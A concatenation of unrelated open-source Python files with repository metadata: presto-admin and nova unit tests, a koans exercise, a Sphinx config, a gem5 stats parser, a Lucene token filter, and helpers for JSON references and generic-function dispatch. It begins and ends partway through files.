os.path.join(get_catalog_directory(), 'tpch.properties'))
out = _AttributeString(error_msg)
out.succeeded = True
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] %s' % error_msg,
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_warning_if_connector_dir_empty(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
listdir_mock.return_value = []
catalog.add()
self.assertEqual('\nWarning: Directory %s is empty. No catalogs will'
' be deployed\n\n' % get_catalog_directory(),
self.test_stderr.getvalue())
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_permission_denied(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
error_msg = ('Permission denied')
listdir_mock.side_effect = OSError(13, error_msg)
fabric.api.env.host = 'localhost'
self.assertRaisesRegexp(SystemExit, '\[localhost\] %s' % error_msg,
catalog.add)
@patch('prestoadmin.catalog.os.remove')
@patch('prestoadmin.catalog.remove_file')
def test_remove_os_error(self, remove_file_mock, remove_mock):
fabric.api.env.host = 'localhost'
error = OSError(13, 'Permission denied')
remove_mock.side_effect = error
self.assertRaisesRegexp(OSError, 'Permission denied',
catalog.remove, 'tpch')
@patch('prestoadmin.catalog.secure_create_directory')
@patch('prestoadmin.util.fabricapi.put')
def test_deploy_files(self, put_mock, create_dir_mock):
local_dir = '/my/local/dir'
remote_dir = '/my/remote/dir'
catalog.deploy_files(['a', 'b'], local_dir, remote_dir,
PRESTO_STANDALONE_USER_GROUP)
create_dir_mock.assert_called_with(remote_dir, PRESTO_STANDALONE_USER_GROUP)
put_mock.assert_any_call('/my/local/dir/a', remote_dir, use_sudo=True,
mode=0600)
put_mock.assert_any_call('/my/local/dir/b', remote_dir, use_sudo=True,
mode=0600)
@patch('prestoadmin.catalog.os.path.isfile')
@patch("__builtin__.open")
def test_validate(self, open_mock, is_file_mock):
is_file_mock.return_value = True
file_obj = open_mock.return_value.__enter__.return_value
file_obj.read.return_value = 'connector.noname=example'
self.assertRaisesRegexp(ConfigurationError,
'Catalog configuration example.properties '
'does not contain connector.name',
catalog.add, 'example')
@patch('prestoadmin.catalog.os.path.isfile')
def test_validate_fail(self, is_file_mock):
is_file_mock.return_value = True
self.assertRaisesRegexp(
SystemExit,
'Error validating ' + os.path.join(get_catalog_directory(), 'example.properties') + '\n\n'
'Underlying exception:\n No such file or directory',
catalog.add, 'example')
@patch('prestoadmin.catalog.get')
@patch('prestoadmin.catalog.files.exists')
@patch('prestoadmin.catalog.ensure_directory_exists')
@patch('prestoadmin.catalog.os.path.exists')
def test_gather_connectors(self, path_exists, ensure_dir_exists,
files_exists, get_mock):
fabric.api.env.host = 'any_host'
path_exists.return_value = False
files_exists.return_value = True
catalog.gather_catalogs('local_config_dir')
get_mock.assert_called_once_with(
constants.REMOTE_CATALOG_DIR, 'local_config_dir/any_host/catalog', use_sudo=True)
# if remote catalog dir does not exist
get_mock.reset_mock()
files_exists.return_value = False
results = catalog.gather_catalogs('local_config_dir')
self.assertEqual([], results)
self.assertFalse(get_mock.called)
|
prestodb/presto-admin
|
tests/unit/test_catalog.py
|
Python
|
apache-2.0
| 9,157
| 0.000655
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutDecoratingWithFunctions(Koan):
def addcowbell(fn):
fn.wow_factor = 'COWBELL BABY!'
return fn
@addcowbell
def mediocre_song(self):
return "o/~ We all live in a broken submarine o/~"
def test_decorators_can_modify_a_function(self):
self.assertMatch(__, self.mediocre_song())
self.assertEqual(__, self.mediocre_song.wow_factor)
# ------------------------------------------------------------------
def xmltag(fn):
def func(*args):
return '<' + fn(*args) + '/>'
return func
@xmltag
def render_tag(self, name):
return name
def test_decorators_can_change_a_function_output(self):
self.assertEqual(__, self.render_tag('llama'))
|
Krakn/learning
|
src/python/python_koans/python2/about_decorating_with_functions.py
|
Python
|
isc
| 832
| 0
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Winton Kafka Streams Python documentation build configuration file, created by
# sphinx-quickstart on Tue May 16 21:00:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# Get the project root dir
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import winton_kafka_streams
from mock import MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return MagicMock()
MOCK_MODULES = ['confluent_kafka', 'confluent_kafka.cimpl', 'confluent_kafka.avro']
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Winton Kafka Streams Python'
copyright = '2017, Winton Group'
author = 'Winton Group'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
from setuptools_scm import get_version
version = release = get_version(root='..')
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'WintonKafkaStreamsPythondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'WintonKafkaStreamsPython.tex', 'Winton Kafka Streams Python Documentation',
'Winton Group', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'wintonkafkastreamspython', 'Winton Kafka Streams Python Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'WintonKafkaStreamsPython', 'Winton Kafka Streams Python Documentation',
author, 'WintonKafkaStreamsPython', 'One line description of project.',
'Miscellaneous'),
]
|
wintoncode/winton-kafka-streams
|
docs/conf.py
|
Python
|
apache-2.0
| 5,443
| 0.002021
|
"""
Project Configuration Importer
Handles the importing the project configuration from a separate location
and validates the version against the specified expected version.
NOTE: If you update this file or any others in scripts and require a
NEW variable in project_cfg, then you need to UPDATE THE EXPECTED_CFG_VERSION
That way, if someone tries to use the new scripts with an old cfg, they'll
get a warning.
"""
import importlib
import os
import sys
PROJECT_CFG_DIR = os.path.realpath(os.path.dirname(__file__) + "/../../cfg/")
PROJECT_CFG_NAME = "project_cfg"
EXPECTED_CFG_VERSION = 1.1
def get_project_cfg():
"""
Returns the project configuration module
"""
sys.path.append(PROJECT_CFG_DIR)
try:
project_cfg_module = importlib.import_module(PROJECT_CFG_NAME)
except:
raise FileNotFoundError("\n\n================================= ERROR ========================================"
"\nUnable to import project configuration: " + PROJECT_CFG_DIR + "/" + PROJECT_CFG_NAME + ".py"
"\n================================================================================\n")
_verify_correct_version(project_cfg_module)
return project_cfg_module
def _verify_correct_version(project_cfg_module):
is_correct_version = False
if project_cfg_module.__CFG_VERSION__ == EXPECTED_CFG_VERSION:
is_correct_version = True
else:
raise Exception("\n\n================================= ERROR ========================================"
"\nIncorrect project configuration version: " + str(project_cfg_module.__CFG_VERSION__) +
"\n Development environment expected: " + str(EXPECTED_CFG_VERSION) +
"\n================================================================================\n")
return is_correct_version
|
Avantol13/mgen
|
dev/scripts/_project_cfg_importer.py
|
Python
|
gpl-3.0
| 1,937
| 0.005163
|
#!/usr/bin/env python
import sys
import re
import os
inFilename = sys.argv[1]
if os.path.isfile(inFilename):
namelength = inFilename.rfind(".")
name = inFilename[0:namelength]
exten = inFilename[namelength:]
outFilename = name+"-cachecmp"+exten
print "inFilename:", inFilename
print "outFilename:", outFilename
fpRead = open(inFilename, "r")
fpWrite = open(outFilename, "w+")
dtbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.dtb.walker).* ([0-9]+)')
dtbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.dtb.walker).* ([0-9]+)')
itbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.itb.walker).* ([0-9]+)')
itbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.itb.walker).* ([0-9]+)')
overallhitsPattern = re.compile(r'.*(l2.overall_hits::total).* ([0-9]+)')
cachehitsPattern = re.compile(r'.*(l2.cachehits).* ([0-9]+)')
threadbeginPattern = re.compile(r'.*Begin Simulation Statistics.*')
threadendPattern =re.compile(r'.*End Simulation Statistics.*')
lines = fpRead.readline()
while lines:
threadbeginmatch = threadbeginPattern.match(lines)
if threadbeginmatch:
dtbwalker1=0
itbwalker1=0
dtbwalker2=0
itbwalker2=0
overallhits=0
cachehits=0
gem5hits=0
ratio = 0
threadlines = fpRead.readline()
while threadlines:
dtbwalker1match = dtbwalker1Pattern.search(threadlines)
itbwalker1match = itbwalker1Pattern.search(threadlines)
dtbwalker2match = dtbwalker2Pattern.search(threadlines)
itbwalker2match = itbwalker2Pattern.search(threadlines)
overallhitsmatch = overallhitsPattern.search(threadlines)
cachehitsmatch = cachehitsPattern.search(threadlines)
threadendmatch = threadendPattern.match(threadlines)
if dtbwalker1match:
dtbwalker1=int(dtbwalker1match.group(2))
if itbwalker1match:
itbwalker1=int(itbwalker1match.group(2))
if dtbwalker2match:
dtbwalker2=int(dtbwalker2match.group(2))
if itbwalker2match:
itbwalker2=int(itbwalker2match.group(2))
if overallhitsmatch:
overallhits=int(overallhitsmatch.group(2))
if cachehitsmatch:
cachehits=int(cachehitsmatch.group(2))
if threadendmatch:
gem5hits=overallhits-(dtbwalker1+dtbwalker2+itbwalker1+itbwalker2)
absval = abs(gem5hits-cachehits)
if gem5hits!=0:
ratio=(absval/float(gem5hits))*100
else:
ratio=float(0)
fpWrite.write("gem5hit %d " % gem5hits)
fpWrite.write("cachehit %d " % cachehits)
fpWrite.write("ratio %.2f%%" % ratio)
fpWrite.write("\n")
break
threadlines = fpRead.readline()
lines = fpRead.readline()
fpRead.close()
fpWrite.close()
|
bcheung92/Paperproject
|
gem5/pyscript/cachecmp.py
|
Python
|
mit
| 2,915
| 0.026072
|
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
import re
from lucene import *
import lucene
dir(lucene)
class vistrailAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = vistrailFilter(result)
result = LowerCaseFilter(result)
result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
class stemmingAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = LowerCaseFilter(result)
result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
# patterns for splitting words into substrings
patterns = [
# 32 char md5 sums
"[a-f0-9]{32}",
# '2D', '3D'
"2D", "3D",
# words beginning with capital letters
"[A-Z][a-z]+",
# capital letter sequence ending with a word that begins with a capital letter
"[A-Z]*(?=[A-Z][a-z])",
# capital letter sequence
"[A-Z]{2,}",
# non-capital letter sequence
"[a-z]{2,}" ]
splitPattern = re.compile("|".join(patterns))
class vistrailFilter(PythonTokenFilter):
TOKEN_TYPE_PART = "text"
def __init__(self, input):
super(vistrailFilter, self).__init__(input)
self.input = input
self.parts = [] # parts found for the current token
self.current = None
def next(self):
if self.parts:
# continue adding parts
part = self.parts.pop()
t = Token(part, self.current.startOffset(),
self.current.endOffset(), self.TOKEN_TYPE_PART)
t.setPositionIncrement(0)
return t
else:
# find parts
self.current = self.input.next()
if self.current is None:
return None
text = str(self.current.termText())
pattern = splitPattern.findall(text)
# remove single characters and duplicates
pattern = set([p for p in pattern if len(p)>1 and p != text])
# if len(pattern) > 0:
# print "vistrailFilter", text, "-->",','.join(pattern)
self.parts = pattern
return self.current
|
CMUSV-VisTrails/WorkflowRecommendation
|
vistrails/index/vistrailanalyzer.py
|
Python
|
bsd-3-clause
| 4,209
| 0.012354
|
"""Various miscellaneous functions to make code easier to read & write."""
import collections.abc
import copy
import functools
import inspect
import logging
import urllib.parse
import jsonpointer
import jsonschema
_logger = logging.getLogger("holocron")
def resolve_json_references(value, context, keep_unknown=True):
def _do_resolve(node):
node = copy.copy(node)
if isinstance(node, collections.abc.Mapping) and "$ref" in node:
uri, fragment = urllib.parse.urldefrag(node["$ref"])
try:
return jsonpointer.resolve_pointer(context[uri], fragment)
except KeyError:
if keep_unknown:
return node
raise
elif isinstance(node, collections.abc.Mapping):
for k, v in node.items():
node[k] = _do_resolve(v)
elif isinstance(node, collections.abc.Sequence) and not isinstance(node, str):
if not isinstance(node, collections.abc.MutableSequence):
node = list(node)
for i in range(len(node)):
node[i] = _do_resolve(node[i])
return node
return _do_resolve(value)
class parameters:
def __init__(self, *, fallback=None, jsonschema=None):
self._fallback = fallback or {}
self._jsonschema = jsonschema
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(app, *args, **kwargs):
signature = inspect.signature(fn)
arguments = signature.bind_partial(app, *args, **kwargs).arguments
# First two arguments always are an application instance and a
# stream of items to process. Since they are passed by Holocron
# core as positional arguments, there's no real need to check their
# schema, so we strip them away.
arguments = dict(list(arguments.items())[2:])
parameters = dict(list(signature.parameters.items())[2:])
# If some parameter has not been passed, a value from a fallback
# must be used instead (if any).
for param in parameters:
if param not in arguments:
try:
value = resolve_json_references(
{"$ref": self._fallback[param]},
{"metadata:": app.metadata},
)
except (jsonpointer.JsonPointerException, KeyError):
continue
# We need to save resolved value in both arguments and
# kwargs mappings, because the former is used to *validate*
# passed arguments, and the latter to supply a value from a
# fallback.
arguments[param] = kwargs[param] = value
if self._jsonschema:
try:
format_checker = jsonschema.FormatChecker()
@format_checker.checks("encoding", (LookupError,))
def is_encoding(value):
if isinstance(value, str):
import codecs
return codecs.lookup(value)
@format_checker.checks("timezone", ())
def is_timezone(value):
if isinstance(value, str):
import dateutil.tz
return dateutil.tz.gettz(value)
@format_checker.checks("path", (TypeError,))
def is_path(value):
if isinstance(value, str):
import pathlib
return pathlib.Path(value)
jsonschema.validate(
arguments,
self._jsonschema,
format_checker=format_checker,
)
except jsonschema.exceptions.ValidationError as exc:
message = exc.message
if exc.absolute_path:
message = f"{'.'.join(exc.absolute_path)}: {exc.message}"
raise ValueError(message)
return fn(app, *args, **kwargs)
return wrapper
|
ikalnytskyi/holocron
|
src/holocron/_processors/_misc.py
|
Python
|
bsd-3-clause
| 4,296
| 0.000466
|
# -*- mode: python -*-
from .combinations import STANDARD_METHOD_COMBINATION
from .specializers import specializer, ROOT_SPECIALIZER
from . import util
from .cache import NoCachePolicy, LRU, TypeCachePolicy
import threading
import inspect
import warnings
try:
from ._py_clos import GenericFunction as GenericFunctionBase
except ImportError:
class GenericFunctionBase:
def __call__(self, *args, **kwargs):
return self.call_slow_path(args, kwargs)
def initialize_cache(self, map, size):
pass
class GenericFunction(GenericFunctionBase):
def __init__(self, name):
self._name = name
self._method_combination = STANDARD_METHOD_COMBINATION
self._methods = []
self._specialized_on = []
self._cache_policies = []
self._lock = threading.Lock()
self.clear_cache()
def redefine(self, method_combination=None):
if method_combination is not None:
self._method_combination = method_combination
self.clear_cache()
def get_cache_size(self):
return len(self._methods) * 4
def cache_should_grow(self):
for i in self._cache_policies:
if i != TypeCachePolicy:
return False
return True
def clear_cache(self):
if self._cache_policies is None:
self._cache = None
else:
for i in self._cache_policies:
if i != TypeCachePolicy:
self._cache = LRU(self.get_cache_size())
return
self._cache = {}
# the idea is that number of possible types is clearly bounded
# so limiting the cache size is unnecessary
def rebuild_specialized_on(self):
maxlen = max((len(i.specializers) for i in self._methods))
bitmap = [False] * maxlen
for i in self._methods:
for j in i.specialized_on:
bitmap[j] = True
self._specialized_on = [idx for idx, i in enumerate(bitmap) if i]
def rebuild_cache_policies(self):
arglen = max((len(i.specializers) for i in self._methods))
spec_count = len(self._specialized_on)
cps = [[]] * spec_count
for i in self._methods:
for idx, j in enumerate(self._specialized_on):
if j >= len(i.specializers):
continue
spec = i.specializers[j]
if spec is None:
continue
cps[idx].append(spec.cache_policy)
cps = [util.common_superclass(*i) for i in cps]
for i in cps:
if i is NoCachePolicy:
self._cache_policies = None
self._cache_policies = cps
def get_cache_map(self):
maxlen = max((len(i.specializers) for i in self._methods))
key = [b"_"] * maxlen
for idx, cp in zip(self._specialized_on, self._cache_policies):
if not hasattr(cp, "c_cache_key"):
return None
key[idx] = cp.c_cache_key
return b"".join(key).rstrip(b'_')
def initialize_c_cache(self):
cm = self.get_cache_map()
if not cm:
self.initialize_cache(b"", 0, False)
else:
self.initialize_cache(cm,
self.get_cache_size(),
self.cache_should_grow())
def add_method(self, method):
with self._lock:
self._methods.append(method)
self.rebuild_specialized_on()
self.rebuild_cache_policies()
self.initialize_c_cache()
self.clear_cache()
def get_cache_key(self, args):
return tuple((cp.get_cache_key(args[self._specialized_on[idx]])
for idx, cp in enumerate(self._cache_policies)))
def get_applicable_methods(self, args):
return sorted((i for i in self._methods if i.matches(args)),
key=lambda i: i.sort_key(args))
def get_effective_method(self, args):
with self._lock:
methods = self.get_applicable_methods(args)
return self._method_combination.compute_effective_method(methods)
def call_slow_path(self, args, kwargs={}):
if self._cache is not None:
ck = self.get_cache_key(args)
if ck in self._cache:
return self._cache[ck](*args, **kwargs)
effective_method = self.get_effective_method(args)
if self._cache is not None:
self._cache[ck] = effective_method
return effective_method(*args, **kwargs)
class Method:
__slots__ = ["proc", "specializers", "qualifiers", "next_method_arg"]
def __init__(self, proc,
specializers=[],
qualifiers=[],
next_method_arg=None):
self.proc = proc
self.specializers = specializers
self.qualifiers = qualifiers
self.next_method_arg = next_method_arg
@property
def specialized_on(self):
return [idx for idx, i in enumerate(self.specializers) if i != None]
def matches(self, args):
for idx, i in enumerate(self.specializers):
if i is None:
continue
if not i.matches(args[idx]):
return False
return True
def sort_key(self, args):
res = []
for idx, i in enumerate(self.specializers):
if idx >= len(args):
break
if i is None:
i = ROOT_SPECIALIZER
res.append(i.sort_key(args[idx]))
return res
@classmethod
def from_annotated_function(cls, proc, qualifiers=[]):
argspec = inspect.getfullargspec(proc)
arg_names = argspec.args[:len(argspec.args) - len(argspec.defaults or [])]
anno = proc.__annotations__
specializers = [(specializer(anno[i]) if i in anno else None)
for i in arg_names]
return cls(proc,
specializers=specializers,
qualifiers=qualifiers,
next_method_arg=("next_method"
if "next_method" in argspec.args else None))
def __call__(self, *args, **kwargs):
return self.callable(*args, **kwargs)
@property
def callable(self):
return self.callable_with_next_method()
def callable_with_next_method(self, next_method=None):
if self.next_method_arg:
def wrapper(*args, **kwargs):
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
return wrapper
else:
return self.proc
def call_method(self, args, kwargs, next_method=None):
if self.next_method_arg:
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
else:
return self.proc(*args, **kwargs)
def defgeneric(name, **kwargs):
gf = GenericFunction(name)
gf.redefine(**kwargs)
return gf
|
adh/py-clos
|
py_clos/base.py
|
Python
|
mit
| 7,245
| 0.003313
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from nova import test
from nova.tests.xenapi import stubs
from nova.virt.xenapi import volumeops
class VolumeAttachTestCase(test.TestCase):
def test_detach_volume_call(self):
registered_calls = []
def regcall(label):
def side_effect(*args, **kwargs):
registered_calls.append(label)
return side_effect
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(volumeops.vm_utils, 'lookup')
self.mox.StubOutWithMock(volumeops.vm_utils, 'find_vbd_by_number')
self.mox.StubOutWithMock(volumeops.vm_utils, 'is_vm_shutdown')
self.mox.StubOutWithMock(volumeops.vm_utils, 'unplug_vbd')
self.mox.StubOutWithMock(volumeops.vm_utils, 'destroy_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
self.mox.StubOutWithMock(volumeops.volume_utils, 'find_sr_from_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'purge_sr')
volumeops.vm_utils.lookup('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
volumeops.vm_utils.find_vbd_by_number(
'session', 'vmref', 'devnumber').AndReturn('vbdref')
volumeops.vm_utils.is_vm_shutdown('session', 'vmref').AndReturn(
False)
volumeops.vm_utils.unplug_vbd('session', 'vbdref')
volumeops.vm_utils.destroy_vbd('session', 'vbdref').WithSideEffects(
regcall('destroy_vbd'))
volumeops.volume_utils.find_sr_from_vbd(
'session', 'vbdref').WithSideEffects(
regcall('find_sr_from_vbd')).AndReturn('srref')
volumeops.volume_utils.purge_sr('session', 'srref')
self.mox.ReplayAll()
ops.detach_volume(
dict(driver_volume_type='iscsi', data='conn_data'),
'instance_1', 'mountpoint')
self.assertEquals(
['find_sr_from_vbd', 'destroy_vbd'], registered_calls)
def test_attach_volume_call(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=True).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
ops.attach_volume(
connection_info,
'instance_1', 'mountpoint')
def test_attach_volume_no_hotplug(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=False).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
ops.attach_volume(
connection_info,
'instance_1', 'mountpoint', hotplug=False)
def test_connect_volume_no_hotplug(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volumeops.VolumeOps(session)
instance_name = 'instance_1'
sr_uuid = '1'
sr_label = 'Disk-for:%s' % instance_name
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
vm_ref = 'vm_ref'
dev_number = 1
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.StubOutWithMock(volumeops.vm_utils, 'create_vbd')
volumeops.vm_utils.create_vbd(
session, vm_ref, vdi_ref, dev_number,
bootable=False, osvol=True).AndReturn(vbd_ref)
self.mox.ReplayAll()
ops._connect_volume(connection_info, dev_number, instance_name,
vm_ref, hotplug=False)
self.assertEquals(False, called['VBD.plug'])
def test_connect_volume(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volumeops.VolumeOps(session)
sr_uuid = '1'
sr_label = 'Disk-for:None'
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.ReplayAll()
ops.connect_volume(connection_info)
self.assertEquals(False, called['VBD.plug'])
|
sridevikoushik31/nova
|
nova/tests/virt/xenapi/test_volumeops.py
|
Python
|
apache-2.0
| 8,108
| 0
|
#!/usr/bin/env python
## vim:ts=4:et:nowrap
"""A user-defined wrapper around string objects
Note: string objects have grown methods in Python 1.6
This module requires Python 1.6 or later.
"""
from types import StringType, UnicodeType
import sys
